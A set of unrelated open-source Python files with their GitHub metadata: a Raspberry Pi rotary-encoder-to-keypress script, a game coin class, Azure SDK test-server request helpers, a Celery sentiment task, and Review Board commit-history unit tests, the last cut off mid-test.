# Virtual keyboard used to translate GPIO events into key presses.
device = uinput.Device([
    uinput.KEY_X,
    uinput.KEY_N,
    uinput.KEY_M,
])
led = LED(17)  # status LED on GPIO17 (set up but otherwise unused here)
button = Button(2)  # push button on GPIO2
def pushedme():
    """Emit an 'X' key press when the physical button is pressed."""
    print('You pushed me')
    device.emit_click(uinput.KEY_X)
button.when_pressed = pushedme
# Running rotary-encoder position, updated by the decoder callback.
pos = 0
def callback(way):
    """Track encoder position and emit N/M key presses per step.

    ``way`` is the step direction reported by the decoder — presumably
    +1/-1; confirm against rotary_encoder.decoder's contract.
    """
    global pos
    pos += way
    print("pos={}".format(pos))
    if way < 0:
        device.emit_click(uinput.KEY_N)
    else:
        device.emit_click(uinput.KEY_M)
pi = pigpio.pi()
# Decode the quadrature signals on GPIO 7/8, invoking `callback` per step.
decoder = rotary_encoder.decoder(pi, 7, 8, callback)
# Block until the user presses Enter, then tear down.
# NOTE(review): raw_input() exists only in Python 2 — use input() under
# Python 3; confirm which interpreter this script targets.
raw_input()
decoder.cancel()
pi.stop()
|
{
"content_hash": "d5c481d5ed6df8c0bea718a8ec40e651",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 52,
"avg_line_length": 15.523809523809524,
"alnum_prop": 0.6595092024539877,
"repo_name": "philipbeber/karaoke",
"id": "395446b61ada8b4da3ae24c46c96a1c009b5e8da",
"size": "652",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pi/rotary_to_keypress.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7982"
},
{
"name": "HTML",
"bytes": "12483"
},
{
"name": "JavaScript",
"bytes": "28306"
},
{
"name": "Python",
"bytes": "3501"
},
{
"name": "Shell",
"bytes": "1737"
}
],
"symlink_target": ""
}
|
"""
A coin is a collectable object. All the coins need tob e collected before allowing the player to
take off in the space ship.
"""
from gameobject import GameObject
import assets
import components
import statevars
import statemgr
class Coin(GameObject):
    """A collectable coin.

    All coins must be collected before the player may take off in the
    space ship.  Collected coins are recorded in the save-state map so
    they stay gone across save/load cycles.
    """
    def __init__(self, scene, name, x, y, **kwargs):
        super(Coin, self).__init__(scene, name, x, y)
        self.sprite = components.AnimSprite(
            self, assets.getSpriteAnim("anims/coin.json"), "spin")
        self.collider = components.SpriteCollide(self, 0, 0, 16, 16)
        self.sound = assets.getSound("sounds/coin.wav")
    def init(self):
        """Initiation code."""
        self.obj_mgr.normal_update.append(self)
        self.collider.addToGroup(self.obj_mgr.player_touchable)
        # If this coin has already been collected, remove it from the map.
        if self.name in statevars.variables["map"].get("coins", []):
            self.kill()
    def destroy(self):
        """Clean up code."""
        self.obj_mgr.normal_update.remove(self)
        self.sprite.destroy()
        self.collider.removeFromGroup(self.obj_mgr.player_touchable)
    def update(self, td):
        """Advance the spin animation."""
        self.sprite.updateAnim(td)
    def spriteCollide(self, gameobject, collider):
        """Since this is in the player_touchable group, this will only be
        called when the player touches the coin.
        """
        self.sound.play()
        self.kill()
        # Record the collection so the coin stays gone after saving and
        # loading.  setdefault() replaces the previous `== None` identity
        # check and handles the first coin and later coins identically.
        statevars.variables["map"].setdefault("coins", []).append(self.name)
        statemgr.get("play").getCoin()
    def debug_draw(self, surface, camera_x, camera_y):
        """Draw debug overlays for the sprite and the collider."""
        super(Coin, self).debug_draw(surface, camera_x, camera_y)
        self.sprite.debug_draw(surface, camera_x, camera_y)
        self.collider.debug_draw(surface, camera_x, camera_y)
|
{
"content_hash": "87e2ab634b569add0f547e06e64bc093",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 117,
"avg_line_length": 39.64,
"alnum_prop": 0.649848637739657,
"repo_name": "ArmchairArmada/COS125Project01",
"id": "9a7174da859ae6c734e0d227cdb2bc02537f66fe",
"size": "2005",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/gameobjects/coin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "392096"
},
{
"name": "Shell",
"bytes": "43"
}
],
"symlink_target": ""
}
|
import base64
import json
from urllib.parse import urlparse, urlunparse

from flask import (
    request,
    jsonify as flask_jsonify,
)

from .structures import CaseInsensitiveDict
# Hosting-environment headers stripped from echoed responses unless the
# client explicitly passes ?show_env (see get_headers()).  The duplicate
# 'X-Forwarded-Protocol' entry that used to appear here has been removed;
# membership/deletion behavior is unchanged.
ENV_HEADERS = (
    'X-Varnish',
    'X-Request-Start',
    'X-Heroku-Queue-Depth',
    'X-Real-Ip',
    'X-Forwarded-Proto',
    'X-Forwarded-Protocol',
    'X-Forwarded-Ssl',
    'X-Heroku-Queue-Wait-Time',
    'X-Forwarded-For',
    'X-Heroku-Dynos-In-Use',
    'X-Forwarded-Port',
    'X-Request-Id',
    'Via',
    'Total-Route-Time',
    'Connect-Time'
)
def assert_with_message(param_name, expected_value, actual_value):
    """Assert that *actual_value* equals *expected_value*.

    On mismatch, the AssertionError message names the offending parameter
    and both values.  The message is only built on failure.
    """
    if expected_value == actual_value:
        return
    assert False, "Expected '{}' to be '{}', got '{}'".format(
        param_name, expected_value, actual_value
    )
def jsonify(*args, **kwargs):
    """Like flask.jsonify, but guarantee the body ends with a newline."""
    response = flask_jsonify(*args, **kwargs)
    body = response.data
    if not body.endswith(b"\n"):
        response.data = body + b"\n"
    return response
def get_url(request):
    """Return the request URL with the scheme the client actually used.

    Since we might be hosted behind a proxy, the original scheme may
    arrive in the X-Forwarded-Proto, X-Forwarded-Protocol, or
    X-Forwarded-Ssl headers; when present, rebuild the URL with it.
    """
    headers = request.headers
    protocol = (headers.get('X-Forwarded-Proto') or
                headers.get('X-Forwarded-Protocol'))
    if protocol is None and headers.get('X-Forwarded-Ssl') == 'on':
        protocol = 'https'
    if protocol is None:
        return request.url
    parts = list(urlparse(request.url))
    parts[0] = protocol  # index 0 is the scheme component
    return urlunparse(parts)
def get_files():
    """Return the uploaded-files dict from the current request context.

    Multiple files under the same key are collected into a list.  File
    bodies are passed through json_safe() so binary uploads become
    base64 data URLs.
    """
    files = {}
    for key, fileobj in request.files.items():
        # NOTE: content type is read via request.files[key] (the first
        # file for that key), matching the original behavior.
        content_type = (request.files[key].content_type or
                        'application/octet-stream')
        value = json_safe(fileobj.read(), content_type)
        existing = files.get(key)
        if existing:
            if isinstance(existing, list):
                existing.append(value)
            else:
                files[key] = [existing, value]
        else:
            files[key] = value
    return files
def get_headers(hide_env=True):
    """Return the request headers as a CaseInsensitiveDict.

    When *hide_env* is true and the client did not pass ?show_env,
    hosting-environment headers (ENV_HEADERS) are stripped.
    """
    headers = dict(request.headers.items())
    if hide_env and 'show_env' not in request.args:
        for name in ENV_HEADERS:
            # pop() with a default tolerates headers that are absent.
            headers.pop(name, None)
    return CaseInsensitiveDict(headers.items())
def semiflatten(multi):
    """Convert a MultiDict into a regular dict.

    Keys with exactly one value map to that value; keys with several
    values map to the list of values.  Falsy inputs (None, empty) are
    returned unchanged.
    """
    if not multi:
        return multi
    expanded = multi.to_dict(flat=False)
    return {
        key: values[0] if len(values) == 1 else values
        for key, values in expanded.items()
    }
def json_safe(string, content_type='application/octet-stream'):
    """Returns JSON-safe version of `string`.

    If `string` is valid UTF-8, the decoded text is returned unmodified,
    as it can safely be encoded to a JSON string.

    If `string` contains raw/binary data, it is Base64-encoded, formatted
    and returned according to the "data" URL scheme (RFC 2397), since
    JSON is not suitable for binary payloads.
    """
    try:
        # UnicodeDecodeError is a ValueError subclass, so a non-UTF-8
        # payload falls through to the base64 branch below.
        string = string.decode('utf-8')
        json.dumps(string)
        return string
    except (ValueError, TypeError):
        # NOTE: `base64` used to be referenced here without being
        # imported, so this branch raised NameError on binary input.
        return b''.join([
            b'data:',
            content_type.encode('utf-8'),
            b';base64,',
            base64.b64encode(string)
        ]).decode('utf-8')
def get_dict(*keys, **extras):
    """Return a dict describing the current request, limited to *keys*.

    *keys* must be drawn from the supported field names below; any
    **extras** are merged into the result afterwards.
    """
    allowed = ('url', 'args', 'form', 'data', 'origin', 'headers', 'files',
               'json', 'method')
    assert all(key in allowed for key in keys)
    data = request.data
    form = semiflatten(request.form)
    try:
        json_payload = json.loads(data.decode('utf-8'))
    except (ValueError, TypeError):
        # Body is not valid JSON (or not decodable text).
        json_payload = None
    everything = dict(
        url=get_url(request),
        args=semiflatten(request.args),
        form=form,
        data=json_safe(data),
        origin=request.headers.get('X-Forwarded-For', request.remote_addr),
        headers=get_headers(),
        files=get_files(),
        json=json_payload,
        method=request.method,
    )
    result = {key: everything.get(key) for key in keys}
    result.update(extras)
    return result
def get_base_url(request):
    """Return the plain-HTTP base URL ("http://<host>") for *request*."""
    return "http://{}".format(request.host)
__all__ = ["assert_with_message",
"get_dict",
"jsonify"]
|
{
"content_hash": "45c259deaf6da0d3a6512af559c44d21",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 102,
"avg_line_length": 28.48447204968944,
"alnum_prop": 0.6033580462276493,
"repo_name": "Azure/azure-sdk-for-python",
"id": "132fb6874b63c6cd6e034847eb3156aeb0a9d369",
"size": "4895",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/core/azure-core/tests/testserver_tests/coretestserver/coretestserver/test_routes/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
from celery import Celery
from textblob import TextBlob
# Celery app wired to a local RabbitMQ broker with the AMQP result
# backend.  NOTE(review): broker/backend are hard-coded — consider
# reading them from configuration.
app = Celery('tasks', backend='amqp', broker='amqp://guest@localhost//')
@app.task
def sentiment(row):
    """Return (id, polarity) for one tweet row.

    ``row`` is a sequence; index 3 is the tweet text and index 0 is
    presumably the tweet id — TODO confirm against the producer's schema.
    Polarity is TextBlob's sentiment score in [-1.0, 1.0].
    """
    blob = TextBlob(row[3])  # tweet text
    return row[0], blob.sentiment.polarity
|
{
"content_hash": "ee1e534b66ba4cd95e7f5d38b90b2fb7",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 72,
"avg_line_length": 22.545454545454547,
"alnum_prop": 0.7056451612903226,
"repo_name": "Nozdi/movies-popularity",
"id": "bc40cabf9be68f8e1cb0b43faadb8ee59da870fa",
"size": "248",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tasks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10135"
},
{
"name": "Shell",
"bytes": "190"
}
],
"symlink_target": ""
}
|
"""Unit tests for reviewboard.diffviewer.commit_utils."""
from __future__ import unicode_literals
from django.utils import six
from kgb import SpyAgency
from reviewboard.diffviewer.commit_utils import (CommitHistoryDiffEntry,
diff_histories,
exclude_ancestor_filediffs,
get_base_and_tip_commits,
get_file_exists_in_history)
from reviewboard.diffviewer.models import DiffCommit
from reviewboard.diffviewer.tests.test_diffutils import \
BaseFileDiffAncestorTests
from reviewboard.scmtools.core import UNKNOWN
from reviewboard.testing.testcase import TestCase
class GetFileExistsInHistoryTests(SpyAgency, TestCase):
    """Unit tests for get_file_exists_in_history.

    Each test builds a ``validation_info`` mapping of commit ID to its
    parent and the files added/modified/removed in that commit, mirroring
    the structure the commit validation API produces.  Tests named
    ``*_with_revision`` cover SCMs that track per-file revisions; the
    ``*_without_revision`` / ``*_unknown_revision`` tests cover SCMs
    (e.g. Mercurial) that report UNKNOWN file revisions.
    """
    fixtures = ['test_scmtools']
    def test_added_in_parent_with_revision(self):
        """Testing get_file_exists_in_history for a file added in the parent
        commit for an SCM that uses file revisions
        """
        repository = self.create_repository()
        validation_info = {
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [{
                        'filename': 'foo',
                        'revision': 'a' * 40,
                    }],
                    'modified': [],
                    'removed': [],
                },
            },
        }
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r1',
            path='foo',
            revision='a' * 40))
    def test_added_in_parent_without_revision(self):
        """Testing get_file_exists_in_history for a file added in the parent
        commit for an SCM that doesn't use file revisions
        """
        repository = self.create_repository(tool_name='Mercurial')
        validation_info = {
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [{
                        'filename': 'foo',
                        'revision': UNKNOWN,
                    }],
                    'modified': [],
                    'removed': [],
                },
            },
        }
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r1',
            path='foo',
            revision=UNKNOWN))
    def test_added_in_grandparent_with_revision(self):
        """Testing get_file_exists_in_history for a file added in a
        grandparent commit for an SCM that uses file revisions
        """
        repository = self.create_repository()
        validation_info = {
            'r2': {
                'parent_id': 'r1',
                'tree': {
                    'added': [],
                    'modified': [],
                    'removed': [],
                },
            },
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [{
                        'filename': 'foo',
                        'revision': 'a' * 40,
                    }],
                    'modified': [],
                    'removed': [],
                },
            },
        }
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r2',
            path='foo',
            revision='a' * 40))
    def test_added_in_grandparent_without_revision(self):
        """Testing get_file_exists_in_history for a file added in a
        grandparent commit for an SCM that doesn't use file revisions
        """
        repository = self.create_repository(tool_name='Mercurial')
        validation_info = {
            'r2': {
                'parent_id': 'r1',
                'tree': {
                    'added': [],
                    'modified': [],
                    'removed': [],
                },
            },
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [{
                        'filename': 'foo',
                        'revision': UNKNOWN,
                    }],
                    'modified': [],
                    'removed': [],
                },
            },
        }
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r2',
            path='foo',
            revision=UNKNOWN))
    def test_removed_in_parent_with_revision(self):
        """Testing get_file_exists_in_history for a file removed in a parent
        revision for an SCM that uses file revisions
        """
        # NOTE: this test was previously misnamed
        # ``test_removed_in_parent_without_revision`` even though it
        # exercises an SCM *with* file revisions; renamed to match its
        # docstring and the naming pattern of the other tests.
        repository = self.create_repository()
        target_path = 'foo'
        target_revision = 'a' * 40
        self.spy_on(
            repository.get_file_exists,
            call_fake=self._make_get_file_exists_in_history(target_path,
                                                            target_revision))
        validation_info = {
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [],
                    'modified': [],
                    'removed': [{
                        'filename': target_path,
                        'revision': target_revision,
                    }],
                },
            },
        }
        # A removed file still existed at the removed revision, so the
        # lookup falls through to the repository itself.
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r1',
            path=target_path,
            revision=target_revision))
        self.assertTrue(repository.get_file_exists.spy.called_with(
            target_path, target_revision))
    def test_removed_in_parent_unknown_revision(self):
        """Testing get_file_exists_in_history for a file removed in a parent
        commit for an SCM that does not use file revisions
        """
        repository = self.create_repository(tool_name='Mercurial')
        validation_info = {
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [],
                    'modified': [],
                    'removed': [{
                        'filename': 'foo',
                        'revision': UNKNOWN,
                    }],
                },
            },
        }
        self.assertFalse(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r1',
            path='foo',
            revision=UNKNOWN))
    def test_removed_readded_in_parent_unknown_revision(self):
        """Testing get_file_exists_in_history for a file removed and re-added
        in parent commits for an SCM that does not use file revisions
        """
        repository = self.create_repository(tool_name='Mercurial')
        validation_info = {
            'r2': {
                'parent_id': 'r1',
                'tree': {
                    'added': [{
                        'filename': 'foo',
                        'revision': UNKNOWN,
                    }],
                    'modified': [],
                    'removed': [],
                },
            },
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [],
                    'modified': [],
                    'removed': [{
                        'filename': 'foo',
                        'revision': UNKNOWN,
                    }],
                },
            },
        }
        # Removed as of r1, but present again once r2 re-adds it.
        self.assertFalse(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r1',
            path='foo',
            revision=UNKNOWN))
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r2',
            path='foo',
            revision=UNKNOWN))
    def test_modified_in_parent_with_revision(self):
        """Testing get_file_exists_in_history for a file modified in a
        parent revision for an SCM that uses file revisions
        """
        repository = self.create_repository()
        self.spy_on(
            repository.get_file_exists,
            call_fake=self._make_get_file_exists_in_history('foo', 'a' * 40))
        validation_info = {
            'r2': {
                'parent_id': 'r1',
                'tree': {
                    'added': [],
                    'modified': [{
                        'filename': 'foo',
                        'revision': 'c' * 40,
                    }],
                    'removed': [],
                },
            },
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [],
                    'modified': [{
                        'filename': 'foo',
                        'revision': 'b' * 40,
                    }],
                    'removed': [],
                },
            },
        }
        # Revisions introduced by pending commits resolve without hitting
        # the repository; only the pre-history revision ('a' * 40) does.
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r2',
            path='foo',
            revision='c' * 40))
        self.assertFalse(repository.get_file_exists.spy.called)
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r1',
            path='foo',
            revision='b' * 40))
        self.assertFalse(repository.get_file_exists.spy.called)
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r0',
            path='foo',
            revision='a' * 40))
        self.assertTrue(repository.get_file_exists.spy.called_with(
            'foo', 'a' * 40,
        ))
    def test_modified_in_parent_unknown_revision(self):
        """Testing get_file_exists_in_history for a file modified in a
        parent revision for an SCM that does not use file revision
        """
        repository = self.create_repository(tool_name='Mercurial')
        self.spy_on(
            repository.get_file_exists,
            call_fake=self._make_get_file_exists_in_history('foo', UNKNOWN))
        validation_info = {
            'r2': {
                'parent_id': 'r1',
                'tree': {
                    'added': [],
                    'modified': [{
                        'filename': 'foo',
                        'revision': UNKNOWN,
                    }],
                    'removed': [],
                },
            },
            'r1': {
                'parent_id': 'r0',
                'tree': {
                    'added': [],
                    'modified': [{
                        'filename': 'foo',
                        'revision': UNKNOWN,
                    }],
                    'removed': [],
                },
            },
        }
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r2',
            path='foo',
            revision=UNKNOWN))
        self.assertFalse(repository.get_file_exists.spy.called)
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r1',
            path='foo',
            revision=UNKNOWN))
        self.assertFalse(repository.get_file_exists.spy.called)
        self.assertTrue(get_file_exists_in_history(
            validation_info=validation_info,
            repository=repository,
            parent_id='r0',
            path='foo',
            revision=UNKNOWN))
        self.assertTrue(repository.get_file_exists.spy.called_with(
            'foo', UNKNOWN))
    def _make_get_file_exists_in_history(self, target_path, target_revision):
        """Return a fake get_file_exists_in_history method for a repository.
        Args:
            target_path (unicode):
                The path that should report as existing in the repository.
            target_revision (unicode):
                The revision of the file.
        Returns:
            callable:
                A function that only returns True when called with the given
                ``target_path`` and ``target_revision``.
        """
        def get_file_exists_in_history(repository, path, revision, *args,
                                       **kwargs):
            return path == target_path and revision == target_revision
        return get_file_exists_in_history
class ExcludeAncestorFileDiffsTests(BaseFileDiffAncestorTests):
    """Unit tests for commit_utils.exclude_ancestor_filediffs."""
    def setUp(self):
        super(ExcludeAncestorFileDiffsTests, self).setUp()
        self.set_up_filediffs()
    def test_exclude(self):
        """Testing exclude_ancestor_filediffs"""
        self._test_excluded(exclude_ancestor_filediffs(self.filediffs))
    def test_exclude_query_count(self):
        """Testing exclude_ancestor_filediffs query count"""
        # Expect one ancestor-computation query per FileDiff when nothing
        # has been cached yet.
        num_queries = len(self.filediffs)
        with self.assertNumQueries(num_queries):
            result = exclude_ancestor_filediffs(self.filediffs)
        self._test_excluded(result)
    def test_exclude_query_count_precomputed(self):
        """Testing exclude_ancestor_filediffs query count when the ancestors
        are pre-computed
        """
        # Prime each FileDiff's ancestor cache so the exclusion below can
        # run without touching the database at all.
        for filediff in self.filediffs:
            filediff.get_ancestors(minimal=False, filediffs=self.filediffs)
        with self.assertNumQueries(0):
            result = exclude_ancestor_filediffs(self.filediffs)
        self._test_excluded(result)
    def _test_excluded(self, result):
        """Test that the given set of FileDiffs matches the expected results.
        Args:
            result (list of reviewboard.diffviewer.models.filediff.FileDiff):
                The FileDiffs that were returned from :py:func:`~reviewboard.
                diffviewer.commit_utils.exclude_ancestor_filediffs`.
        Raises:
            AssertionError:
                The FileDiffs do not match the expected results.
        """
        # Index the fixture FileDiffs by their identifying details so the
        # expected survivors can be looked up declaratively below.
        by_details = {
            (
                filediff.commit_id,
                filediff.source_file,
                filediff.source_revision,
                filediff.dest_file,
                filediff.dest_detail,
            ): filediff
            for filediff in self.filediffs
        }
        # Only the latest FileDiff in each ancestor chain should survive.
        expected = {
            by_details[details]
            for details in (
                (2, 'baz', '7601807', 'baz', '280beb2'),
                (3, 'foo', '257cc56', 'qux', '03b37a0'),
                (3, 'corge', 'e69de29', 'corge', 'f248ba3'),
                (4, 'bar', '5716ca5', 'quux', 'e69de29'),
            )
        }
        self.assertEqual(expected, set(result))
class DiffHistoriesTests(TestCase):
    """Unit tests for reviewboard.diffviewer.commit_utils.diff_histories.

    Each test compares an old and a new list of DiffCommits and checks
    the resulting sequence of CommitHistoryDiffEntry records (unmodified,
    added, and removed entries).
    """
    def test_diff_histories_identical(self):
        """Testing diff_histories with identical histories"""
        new_history = old_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        expected_result = [
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[0],
                new_commit=new_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[1],
                new_commit=new_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[2],
                new_commit=new_history[2]),
        ]
        self.assertEqual(list(diff_histories(old_history, new_history)),
                         expected_result)
    def test_diff_histories_added(self):
        """Testing diff_histories with a new history that adds commits at the
        end of the history
        """
        old_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
        ]
        new_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        expected_result = [
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[0],
                new_commit=new_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[1],
                new_commit=new_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[2]),
        ]
        self.assertEqual(list(diff_histories(old_history, new_history)),
                         expected_result)
    def test_diff_histories_removed(self):
        """Testing diff_histories with a new history that removes commits"""
        old_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        new_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
        ]
        expected_result = [
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[0],
                new_commit=new_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[1],
                new_commit=new_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[2]),
        ]
        self.assertEqual(list(diff_histories(old_history, new_history)),
                         expected_result)
    def test_diff_histories_added_start(self):
        """Testing diff_histories with a new history that adds commits at the
        start of the history
        """
        old_history = [
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        new_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        # Inserting at the start invalidates the whole old history: every
        # old commit reads as removed and every new commit as added.
        expected_result = [
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[2]),
        ]
        self.assertEqual(list(diff_histories(old_history, new_history)),
                         expected_result)
    def test_diff_histories_removed_start(self):
        """Testing diff_histories with a new history that removes commits at
        the start of the history
        """
        old_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        new_history = [
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        expected_result = [
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[2]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[1]),
        ]
        self.assertEqual(list(diff_histories(old_history, new_history)),
                         expected_result)
    def test_diff_histories_added_middle(self):
        """Testing diff_histories with a new history that adds commits in the
        middle of the history
        """
        # NOTE: renamed from the misspelled
        # ``test_diff_histories_addedd_middle``.
        old_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r2'),
        ]
        new_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        expected_result = [
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[0],
                new_commit=new_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[2]),
        ]
        self.assertEqual(list(diff_histories(old_history, new_history)),
                         expected_result)
    def test_diff_histories_removed_middle(self):
        """Testing diff_histories with a new history that removes commits in
        the middle of the history
        """
        old_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r1'),
            DiffCommit(commit_id='r2'),
        ]
        new_history = [
            DiffCommit(commit_id='r0'),
            DiffCommit(commit_id='r2'),
        ]
        expected_result = [
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_UNMODIFIED,
                old_commit=old_history[0],
                new_commit=new_history[0]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[1]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_REMOVED,
                old_commit=old_history[2]),
            CommitHistoryDiffEntry(
                entry_type=CommitHistoryDiffEntry.COMMIT_ADDED,
                new_commit=new_history[1]),
        ]
        self.assertEqual(list(diff_histories(old_history, new_history)),
                         expected_result)
class GetBaseAndTipCommitsTests(TestCase):
    """Unit tests for commit_utils.get_base_and_tip_commits."""
    fixtures = ['test_scmtools']
    def setUp(self):
        super(GetBaseAndTipCommitsTests, self).setUp()
        self.repository = self.create_repository(tool_name='Git')
        self.diffset = self.create_diffset(repository=self.repository)
        # Map of DiffCommit primary key -> DiffCommit for a linear r1..r6
        # history, so tests can address commits by pk.
        self.commits = {
            commit.pk: commit
            for commit in (
                self.create_diffcommit(diffset=self.diffset, **kwargs)
                for kwargs in (
                    {'commit_id': 'r1', 'parent_id': 'r0'},
                    {'commit_id': 'r2', 'parent_id': 'r1'},
                    {'commit_id': 'r3', 'parent_id': 'r2'},
                    {'commit_id': 'r4', 'parent_id': 'r3'},
                    {'commit_id': 'r5', 'parent_id': 'r4'},
                    {'commit_id': 'r6', 'parent_id': 'r5'},
                )
            )
        }
    def test_get_base_and_tip_commits_no_commits_no_diffset(self):
        """Testing get_base_and_tip_commits with no commits and no diffset
        raises ValueError
        """
        with self.assertRaises(ValueError):
            get_base_and_tip_commits(base_commit_id=1,
                                     tip_commit_id=5)
    def test_get_base_and_tip_commits_commits_no_diffset(self):
        """Testing get_base_and_tip_commits with commits and no diffset"""
        # Passing the commits explicitly should avoid any database work.
        with self.assertNumQueries(0):
            base, tip = get_base_and_tip_commits(
                base_commit_id=1,
                tip_commit_id=5,
                commits=[
                    commit
                    for commit in six.itervalues(self.commits)
                ])
